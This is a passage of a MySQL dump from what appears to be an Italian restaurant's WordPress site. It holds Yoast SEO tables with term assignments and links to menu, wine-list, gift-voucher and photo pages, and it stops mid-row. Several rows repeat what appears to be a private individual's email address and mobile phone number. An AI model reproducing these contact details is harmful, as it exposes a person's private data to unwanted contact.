/*!40000 ALTER TABLE `wp_yoast_primary_term` DISABLE KEYS */;
INSERT INTO `wp_yoast_primary_term` VALUES (1,225,1,'category','2020-04-29 22:14:28','2020-05-13 14:03:54',1),(2,283,1,'category','2020-04-29 22:14:29','2020-05-13 14:03:54',1),(3,330,1,'category','2020-04-29 22:14:29','2020-05-13 14:03:54',1),(4,529,1,'category','2020-04-29 22:14:34','2020-05-13 14:03:54',1),(5,727,1,'category','2020-04-29 22:14:34','2020-05-13 14:03:54',1),(6,784,1,'category','2020-04-29 22:14:34','2020-05-13 14:03:54',1),(7,909,1,'category','2020-04-29 22:14:34','2020-05-13 14:03:54',1),(8,943,1,'category','2020-04-29 22:14:34','2020-05-13 14:03:54',1),(9,590,1,'category','2020-04-29 22:14:44','2020-05-13 14:03:54',1),(10,620,1,'category','2020-04-29 22:14:44','2020-05-13 14:03:54',1),(11,328,13,'product_cat','2020-05-13 14:21:40','2020-05-13 18:21:40',1),(12,329,13,'product_cat','2020-05-13 14:21:58','2020-05-13 18:21:58',1),(13,331,13,'product_cat','2020-05-13 14:22:12','2020-05-13 18:22:12',1),(14,323,12,'product_cat','2020-05-14 00:20:28','2020-05-14 04:20:28',1),(15,333,12,'product_cat','2020-05-14 17:27:28','2020-05-14 21:27:28',1),(16,337,13,'product_cat','2020-05-15 00:41:13','2020-05-15 04:41:13',1),(17,325,12,'product_cat','2020-05-16 10:00:41','2020-05-16 14:00:41',1),(18,548,26,'product_cat','2020-05-17 19:12:03','2020-05-17 23:12:03',1),(19,631,12,'product_cat','2020-05-17 23:06:33','2020-05-18 03:06:33',1),(20,875,27,'product_cat','2020-06-03 14:21:52','2020-06-03 18:21:52',1),(21,211,7,'product_cat','2020-06-05 14:29:10','2020-06-05 18:29:10',1),(22,288,11,'product_cat','2020-06-05 14:29:13','2020-06-05 18:29:13',1),(23,213,7,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(24,216,7,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(25,220,7,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(26,244,7,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(27,482,26,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(28,483,26,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(29,484,26,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(30,485,26,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(31,290,11,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(32,322,12,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(33,324,12,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(34,435,23,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(35,472,23,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(36,474,23,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(37,475,23,'product_cat','2020-06-05 14:29:17','2021-01-29 17:55:04',1),(38,630,12,'product_cat','2020-06-05 14:29:17','2020-06-05 18:29:17',1),(39,3388,83,'portfolio-category','2020-12-06 17:23:00','2020-12-06 22:29:09',1),(40,3389,84,'portfolio-category','2020-12-06 17:24:09','2020-12-06 22:28:58',1),(41,3390,85,'portfolio-category','2020-12-06 17:25:34','2020-12-06 22:28:45',1),(42,2942,42,'portfolio-category','2020-12-06 17:30:29','2020-12-06 22:30:29',1);
/*!40000 ALTER TABLE `wp_yoast_primary_term` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_seo_links`
--

DROP TABLE IF EXISTS `wp_yoast_seo_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL,
  `target_post_id` bigint(20) unsigned NOT NULL,
  `type` varchar(8) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `indexable_id` int(11) unsigned DEFAULT NULL,
  `target_indexable_id` int(11) unsigned DEFAULT NULL,
  `height` int(11) unsigned DEFAULT NULL,
  `width` int(11) unsigned DEFAULT NULL,
  `size` int(11) unsigned DEFAULT NULL,
  `language` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `region` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`),
  KEY `indexable_link_direction` (`indexable_id`,`type`)
) ENGINE=MyISAM AUTO_INCREMENT=1393 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_seo_links`
--

LOCK TABLES `wp_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `wp_yoast_seo_links` DISABLE KEYS */;
INSERT INTO `wp_yoast_seo_links` VALUES (31,'http://www.ristorantesolymar.it/menu/la-pasta/',10,51,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(32,'http://www.ristorantesolymar.it/menu/menu-bambini/',10,14,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(33,'http://www.ristorantesolymar.it/menu/antipasti-cotti/',10,47,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(34,'http://www.ristorantesolymar.it/menu/il-pesce/',10,108,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(35,'http://www.ristorantesolymar.it/menu/pesce-crudo/',10,49,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(36,'http://www.ristorantesolymar.it/menu/i-dolci/',10,54,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(37,'http://www.ristorantesolymar.it/menu/le-5-portate-dello-chef/',10,5,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(39,'http://www.ristorantesolymar.it/?mwb_wgm_preview_email=mwb_wgm_preview_email&product_id=435&TB_iframe=true&width=630&height=500',476,32,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(40,'http://www.ristorantesolymar.it/?mwb_wgm_preview_email=mwb_wgm_preview_email&product_id=472&TB_iframe=true&width=630&height=500',476,32,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(41,'http://www.ristorantesolymar.it/?mwb_wgm_preview_email=mwb_wgm_preview_email&product_id=474&TB_iframe=true&width=630&height=500',476,32,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(42,'http://www.ristorantesolymar.it/?mwb_wgm_preview_email=mwb_wgm_preview_email&product_id=475&TB_iframe=true&width=630&height=500',476,32,'internal',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(46,'javascript:void(0);',712,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(47,'https://www.instagram.com/',712,0,'external',NULL,NULL,NULL,NULL,NULL,NULL,NULL),(96,'https://www.ristorantesolymar.it/carta-dei-vini/vini-al-bicchiere/',22,106,'internal',45,151,NULL,NULL,NULL,NULL,NULL),(97,'https://www.ristorantesolymar.it/carta-dei-vini/le-mille-e-una-bollicina/',22,73,'internal',45,47,NULL,NULL,NULL,NULL,NULL),(98,'https://www.ristorantesolymar.it/carta-dei-vini/birre/',22,69,'internal',45,125,NULL,NULL,NULL,NULL,NULL),(99,'https://www.ristorantesolymar.it/carta-dei-vini/francia-champagne/',22,75,'internal',45,137,NULL,NULL,NULL,NULL,NULL),(100,'https://www.ristorantesolymar.it/carta-dei-vini/franciacorta/',22,71,'internal',45,136,NULL,NULL,NULL,NULL,NULL),(101,'https://www.ristorantesolymar.it/carta-dei-vini/i-blanc-de-noir/',22,77,'internal',45,138,NULL,NULL,NULL,NULL,NULL),(102,'https://www.ristorantesolymar.it/carta-dei-vini/champagne-assemblaggi/',22,79,'internal',45,139,NULL,NULL,NULL,NULL,NULL),(103,'https://www.ristorantesolymar.it/carta-dei-vini/assemblaggi-e-rose/',22,81,'internal',45,140,NULL,NULL,NULL,NULL,NULL),(104,'https://www.ristorantesolymar.it/carta-dei-vini/piemonte-liguria-lombardia/',22,102,'internal',45,149,NULL,NULL,NULL,NULL,NULL),(105,'https://www.ristorantesolymar.it/carta-dei-vini/trentino-veneto/',22,104,'internal',45,150,NULL,NULL,NULL,NULL,NULL),(106,'https://www.ristorantesolymar.it/carta-dei-vini/emilia-romagna-val-daosta/',22,83,'internal',45,141,NULL,NULL,NULL,NULL,NULL),(107,'https://www.ristorantesolymar.it/carta-dei-vini/friuli-venezia-giulia/',22,85,'internal',45,142,NULL,NULL,NULL,NULL,NULL),(108,'https://www.ristorantesolymar.it/carta-dei-vini/marche-toscana-umbria/',22,87,'internal',45,44,NULL,NULL,NULL,NULL,NULL),(109,'https://www.ristorantesolymar.it/carta-dei-vini/abruzzo-campania/',22,89,'internal',45,143,NULL,NULL,NULL,NULL,NULL),(110,'https://www.ristorantesolymar.it/carta-dei-vini/sicilia-sardegna/',22,91,'internal',45,144,NULL,NULL,NULL,NULL,NULL),(111,'https://www.ristorantesolymar.it/carta-dei-vini/austria-germania-spagna-nuova-zelanda/',22,96,'internal',45,146,NULL,NULL,NULL,NULL,NULL),(112,'https://www.ristorantesolymar.it/carta-dei-vini/francia-2/',22,1005,'internal',45,198,NULL,NULL,NULL,NULL,NULL),(113,'https://www.ristorantesolymar.it/carta-dei-vini/germania/',22,1003,'internal',45,197,NULL,NULL,NULL,NULL,NULL),(114,'https://www.ristorantesolymar.it/carta-dei-vini/vini-rosati/',22,1009,'internal',45,199,NULL,NULL,NULL,NULL,NULL),(115,'https://www.ristorantesolymar.it/carta-dei-vini/vini-rossi/',22,100,'internal',45,148,NULL,NULL,NULL,NULL,NULL),(116,'http://www.ristorantesolymar.it/regala-cena/',36,476,'internal',40,32,NULL,NULL,NULL,NULL,NULL),(117,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-creativo-per-2-persone-con-bevande/',36,472,'internal',40,173,NULL,NULL,NULL,NULL,NULL),(118,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-creativo-per-2-persone-con-bevande/',36,472,'internal',40,173,NULL,NULL,NULL,NULL,NULL),(119,'https://www.ristorantesolymar.it/?mwb_wgm_preview_email=mwb_wgm_preview_email&product_id=472&TB_iframe=true&width=630&height=500',36,32,'internal',40,2,NULL,NULL,NULL,NULL,NULL),(120,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-storico-per-2-persone-con-bevande/',36,475,'internal',40,175,NULL,NULL,NULL,NULL,NULL),(121,'https://www.ristorantesolymar.it/prodotto/regala-cena-menu-storico-per-2-persone-con-bevande/',36,475,'internal',40,175,NULL,NULL,NULL,NULL,NULL),(122,'https://www.ristorantesolymar.it/?mwb_wgm_preview_email=mwb_wgm_preview_email&product_id=475&TB_iframe=true&width=630&height=500',36,32,'internal',40,2,NULL,NULL,NULL,NULL,NULL),(123,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason-300x375.jpg',36,0,'image-in',40,NULL,NULL,NULL,NULL,NULL,NULL),(124,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason-300x375.jpg',36,0,'image-in',40,NULL,NULL,NULL,NULL,NULL,NULL),(125,'https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit',1142,0,'internal',291,NULL,NULL,NULL,NULL,NULL,NULL),(126,'mailto:Filos4@libero.it',1142,0,'external',291,NULL,NULL,NULL,NULL,NULL,NULL),(127,'tel:3204217844',1142,0,'external',291,NULL,NULL,NULL,NULL,NULL,NULL),(128,'mailto:Filos4@libero.it',1143,0,'external',292,NULL,NULL,NULL,NULL,NULL,NULL),(129,'tel:3204217844',1143,0,'external',292,NULL,NULL,NULL,NULL,NULL,NULL),(130,'https://www.ristorantesolymar.it/info-privacy/',1145,172,'internal',294,152,NULL,NULL,NULL,NULL,NULL),(131,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',1145,407,'image-in',294,86,150,237,7722,NULL,NULL),(132,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',1145,473,'image-in',294,117,108,172,1789,NULL,NULL),(133,'https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg',1145,0,'image-in',294,NULL,NULL,NULL,NULL,NULL,NULL),(134,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png',1145,0,'image-in',294,NULL,NULL,NULL,NULL,NULL,NULL),(135,'https://www.ristorantesolymar.it/info-privacy/',1147,172,'internal',296,152,NULL,NULL,NULL,NULL,NULL),(136,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',1147,407,'image-in',296,86,150,237,7722,NULL,NULL),(137,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',1147,473,'image-in',296,117,108,172,1789,NULL,NULL),(138,'https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg',1147,0,'image-in',296,NULL,NULL,NULL,NULL,NULL,NULL),(139,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png',1147,0,'image-in',296,NULL,NULL,NULL,NULL,NULL,NULL),(140,'https://wordpress.org/plugins/post-smtp/',1149,0,'external',298,NULL,NULL,NULL,NULL,NULL,NULL),(141,'http://poofytoo.com',1149,0,'external',298,NULL,NULL,NULL,NULL,NULL,NULL),(142,'https://wordpress.org/plugins/post-smtp/',1150,0,'external',299,NULL,NULL,NULL,NULL,NULL,NULL),(143,'http://poofytoo.com',1150,0,'external',299,NULL,NULL,NULL,NULL,NULL,NULL),(144,'https://wordpress.org/plugins/post-smtp/',1151,0,'external',300,NULL,NULL,NULL,NULL,NULL,NULL),(145,'http://poofytoo.com',1151,0,'external',300,NULL,NULL,NULL,NULL,NULL,NULL),(146,'https://wordpress.org/plugins/post-smtp/',1152,0,'external',301,NULL,NULL,NULL,NULL,NULL,NULL),(147,'http://poofytoo.com',1152,0,'external',301,NULL,NULL,NULL,NULL,NULL,NULL),(148,'https://www.ristorantesolymar.it/info-privacy/',1155,172,'internal',304,152,NULL,NULL,NULL,NULL,NULL),(149,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',1155,407,'image-in',304,86,150,237,7722,NULL,NULL),(150,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',1155,473,'image-in',304,117,108,172,1789,NULL,NULL),(151,'https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg',1155,0,'image-in',304,NULL,NULL,NULL,NULL,NULL,NULL),(152,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png',1155,0,'image-in',304,NULL,NULL,NULL,NULL,NULL,NULL),(153,'https://www.ristorantesolymar.it/info-privacy/',1156,172,'internal',305,152,NULL,NULL,NULL,NULL,NULL),(154,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',1156,407,'image-in',305,86,150,237,7722,NULL,NULL),(155,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',1156,473,'image-in',305,117,108,172,1789,NULL,NULL),(156,'https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg',1156,0,'image-in',305,NULL,NULL,NULL,NULL,NULL,NULL),(157,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png',1156,0,'image-in',305,NULL,NULL,NULL,NULL,NULL,NULL),(158,'https://www.ristorantesolymar.it/info-privacy/',1159,172,'internal',308,152,NULL,NULL,NULL,NULL,NULL),(159,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',1159,407,'image-in',308,86,150,237,7722,NULL,NULL),(160,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',1159,473,'image-in',308,117,108,172,1789,NULL,NULL),(161,'https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg',1159,0,'image-in',308,NULL,NULL,NULL,NULL,NULL,NULL),(162,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png',1159,0,'image-in',308,NULL,NULL,NULL,NULL,NULL,NULL),(163,'https://www.ristorantesolymar.it/info-privacy/',1160,172,'internal',309,152,NULL,NULL,NULL,NULL,NULL),(164,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',1160,407,'image-in',309,86,150,237,7722,NULL,NULL),(165,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',1160,473,'image-in',309,117,108,172,1789,NULL,NULL),(166,'https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg',1160,0,'image-in',309,NULL,NULL,NULL,NULL,NULL,NULL),(167,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png',1160,0,'image-in',309,NULL,NULL,NULL,NULL,NULL,NULL),(168,'mailto:Filos4@libero.it',1161,0,'external',310,NULL,NULL,NULL,NULL,NULL,NULL),(169,'tel:3204217844',1161,0,'external',310,NULL,NULL,NULL,NULL,NULL,NULL),(170,'mailto:Filos4@libero.it',1162,0,'external',311,NULL,NULL,NULL,NULL,NULL,NULL),(171,'tel:3204217844',1162,0,'external',311,NULL,NULL,NULL,NULL,NULL,NULL),(172,'https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit',1163,0,'internal',312,NULL,NULL,NULL,NULL,NULL,NULL),(173,'mailto:Filos4@libero.it',1163,0,'external',312,NULL,NULL,NULL,NULL,NULL,NULL),(174,'tel:3204217844',1163,0,'external',312,NULL,NULL,NULL,NULL,NULL,NULL),(175,'https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit',1164,0,'internal',313,NULL,NULL,NULL,NULL,NULL,NULL),(176,'mailto:Filos4@libero.it',1164,0,'external',313,NULL,NULL,NULL,NULL,NULL,NULL),(177,'tel:3204217844',1164,0,'external',313,NULL,NULL,NULL,NULL,NULL,NULL),(178,'https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit',1167,0,'internal',316,NULL,NULL,NULL,NULL,NULL,NULL),(179,'mailto:Filos4@libero.it',1167,0,'external',316,NULL,NULL,NULL,NULL,NULL,NULL),(180,'tel:3204217844',1167,0,'external',316,NULL,NULL,NULL,NULL,NULL,NULL),(181,'https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit',1168,0,'internal',317,NULL,NULL,NULL,NULL,NULL,NULL),(182,'mailto:Filos4@libero.it',1168,0,'external',317,NULL,NULL,NULL,NULL,NULL,NULL),(183,'tel:3204217844',1168,0,'external',317,NULL,NULL,NULL,NULL,NULL,NULL),(264,'https://www.ristorantesolymar.it/wp-content/uploads/2015/07/11059770_10154021915942738_6099049076285366168_n.jpg',141,67,'internal',43,55,NULL,NULL,NULL,NULL,NULL),(265,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1441.jpg',141,135,'internal',43,58,NULL,NULL,NULL,NULL,NULL),(266,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1608.jpg',141,137,'internal',43,60,NULL,NULL,NULL,NULL,NULL),(267,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1922.jpg',141,138,'internal',43,61,NULL,NULL,NULL,NULL,NULL),(268,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0024.jpg',141,1183,'internal',43,332,NULL,NULL,NULL,NULL,NULL),(269,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0025.jpg',141,1184,'internal',43,333,NULL,NULL,NULL,NULL,NULL),(270,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0027-1.jpg',141,1185,'internal',43,334,NULL,NULL,NULL,NULL,NULL),(271,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0028-1.jpg',141,1186,'internal',43,335,NULL,NULL,NULL,NULL,NULL),(272,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0026.jpg',141,1187,'internal',43,336,NULL,NULL,NULL,NULL,NULL),(273,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0183-1.jpg',141,1188,'internal',43,337,NULL,NULL,NULL,NULL,NULL),(274,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0033-1.jpg',141,1189,'internal',43,338,NULL,NULL,NULL,NULL,NULL),(275,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0035-1.jpg',141,1190,'internal',43,339,NULL,NULL,NULL,NULL,NULL),(276,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0040.jpg',141,1191,'internal',43,340,NULL,NULL,NULL,NULL,NULL),(277,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0041-1.jpg',141,1192,'internal',43,341,NULL,NULL,NULL,NULL,NULL),(278,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0042.jpg',141,1193,'internal',43,342,NULL,NULL,NULL,NULL,NULL),(279,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0044-1.jpg',141,1194,'internal',43,343,NULL,NULL,NULL,NULL,NULL),(280,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0045-1.jpg',141,1195,'internal',43,344,NULL,NULL,NULL,NULL,NULL),(281,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0046.jpg',141,1196,'internal',43,345,NULL,NULL,NULL,NULL,NULL),(282,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0050-1.jpg',141,1197,'internal',43,346,NULL,NULL,NULL,NULL,NULL),(283,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0052.jpg',141,1198,'internal',43,347,NULL,NULL,NULL,NULL,NULL),(284,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0055.jpg',141,1199,'internal',43,348,NULL,NULL,NULL,NULL,NULL),(285,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0066.jpg',141,1200,'internal',43,349,NULL,NULL,NULL,NULL,NULL),(286,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0181.jpg',141,1201,'internal',43,350,NULL,NULL,NULL,NULL,NULL),(287,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0182.jpg',141,1202,'internal',43,351,NULL,NULL,NULL,NULL,NULL),(288,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1643.jpg',141,146,'internal',43,66,NULL,NULL,NULL,NULL,NULL),(289,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1045.jpg',141,143,'internal',43,63,NULL,NULL,NULL,NULL,NULL),(290,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1146.jpg',141,145,'internal',43,65,NULL,NULL,NULL,NULL,NULL),(291,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1120.jpg',141,144,'internal',43,64,NULL,NULL,NULL,NULL,NULL),(292,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1044.jpg',141,142,'internal',43,62,NULL,NULL,NULL,NULL,NULL),(293,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1444.jpg',141,136,'internal',43,59,NULL,NULL,NULL,NULL,NULL),(294,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1830.jpg',141,147,'internal',43,67,NULL,NULL,NULL,NULL,NULL),(295,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1409.jpg',141,134,'internal',43,57,NULL,NULL,NULL,NULL,NULL),(296,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0093-1.jpg',141,1181,'internal',43,330,NULL,NULL,NULL,NULL,NULL),(297,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0095-1.jpg',141,1180,'internal',43,329,NULL,NULL,NULL,NULL,NULL),(298,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0100-1.jpg',141,1179,'internal',43,328,NULL,NULL,NULL,NULL,NULL),(299,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0101-1.jpg',141,1178,'internal',43,327,NULL,NULL,NULL,NULL,NULL),(300,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg',141,1177,'internal',43,326,NULL,NULL,NULL,NULL,NULL),(301,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0076-1.jpg',141,1174,'internal',43,324,NULL,NULL,NULL,NULL,NULL),(302,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0139.jpg',141,1176,'internal',43,325,NULL,NULL,NULL,NULL,NULL),(303,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0122.jpg',141,1182,'internal',43,331,NULL,NULL,NULL,NULL,NULL),(304,'https://www.ristorantesolymar.it/wp-content/uploads/2015/07/11059770_10154021915942738_6099049076285366168_n-300x161.jpg',141,67,'image-in',43,55,514,960,163027,NULL,NULL),(305,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1441-300x225.jpg',141,135,'image-in',43,58,675,900,101397,NULL,NULL),(306,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1608-300x225.jpg',141,137,'image-in',43,60,675,900,165156,NULL,NULL),(307,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1922-300x225.jpg',141,138,'image-in',43,61,675,900,100760,NULL,NULL),(308,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0024-300x200.jpg',141,1183,'image-in',43,332,853,1280,902556,NULL,NULL),(309,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0025-300x200.jpg',141,1184,'image-in',43,333,853,1280,757442,NULL,NULL),(310,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0027-1-300x200.jpg',141,1185,'image-in',43,334,853,1280,669755,NULL,NULL),(311,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0028-1-200x300.jpg',141,1186,'image-in',43,335,1280,853,743646,NULL,NULL),(312,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0026-300x200.jpg',141,1187,'image-in',43,336,853,1280,708853,NULL,NULL),(313,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0183-1-300x200.jpg',141,1188,'image-in',43,337,853,1280,972961,NULL,NULL),(314,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0033-1-300x200.jpg',141,1189,'image-in',43,338,853,1280,605460,NULL,NULL),(315,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0035-1-300x200.jpg',141,1190,'image-in',43,339,853,1280,1038350,NULL,NULL),(316,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0040-200x300.jpg',141,1191,'image-in',43,340,1280,853,654236,NULL,NULL),(317,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0041-1-300x200.jpg',141,1192,'image-in',43,341,853,1280,563267,NULL,NULL),(318,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0042-300x200.jpg',141,1193,'image-in',43,342,853,1280,929748,NULL,NULL),(319,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0044-1-300x200.jpg',141,1194,'image-in',43,343,853,1280,1047998,NULL,NULL),(320,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0045-1-300x200.jpg',141,1195,'image-in',43,344,853,1280,454305,NULL,NULL),(321,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0046-200x300.jpg',141,1196,'image-in',43,345,1280,853,889179,NULL,NULL),(322,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0050-1-300x200.jpg',141,1197,'image-in',43,346,853,1280,540046,NULL,NULL),(323,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0052-200x300.jpg',141,1198,'image-in',43,347,1280,853,614820,NULL,NULL),(324,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0055-300x200.jpg',141,1199,'image-in',43,348,853,1280,1750088,NULL,NULL),(325,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0066-300x200.jpg',141,1200,'image-in',43,349,853,1280,604193,NULL,NULL),(326,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0181-200x300.jpg',141,1201,'image-in',43,350,1280,853,1036361,NULL,NULL),(327,'https://www.ristorantesolymar.it/wp-content/uploa